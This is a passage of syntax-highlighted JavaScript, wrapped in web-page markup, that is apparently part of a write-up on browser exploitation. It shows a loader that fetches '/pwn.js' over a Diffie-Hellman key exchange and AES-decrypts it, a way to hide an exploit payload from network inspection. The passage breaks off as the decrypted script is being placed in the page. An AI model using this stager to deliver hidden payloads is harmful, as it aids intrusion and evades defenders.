class=\"crayon-e\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;crypto\/aes.js&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-17\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-18\"><span class=\"crayon-r\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-20\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">g<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;115740200527109164239523414760926155534485715860090261532154107313946218459149402375178179458041461723723231563839316251515439564315555249353831328479173170684416728715378198172203100328308536292821245983596065287318698169565702979765910089654821728828592422299160041156491980943427556153020487552135890973413&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-21\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;124325339146889384540494091085456630009856882741872806181731279018491820800119460022367403769795008250021191767583423221479185609066059226301250167164084041279837566626881119772675984258163062926954046545485368458404445166682380071370274810671501916789361956272226105723317679562001235501455748016154805420913&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-22\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-24\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;name&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AES-CBC&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;iv&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-27\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-29\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Math<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ceil<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getRandomValues<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">digits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">forEach<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">digits<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">bigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bigInt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">digits<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-35\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-37\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">aesDecrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">value<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">map<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">^<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">slice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">typeof<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">subtle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;undefined&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">subtle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">importKey<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;raw&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;decrypt&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;encrypt&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">subtle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aesjs<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ModeOfOperation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cbc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aes<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padLen<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">slice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padLen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-52\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-53\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-54\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fetchDH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ascii<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">g<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">modPow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-e\">fetch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?x=&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">B<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">B<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">B<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">modPow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-e\">aesDecrypt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cipher<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ascii<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">fromCharCode<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">apply<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-66\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-68\"><span class=\"crayon-e\">async <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go_enc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">js<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">await <\/span><span class=\"crayon-e\">fetchDH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/pwn.js&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 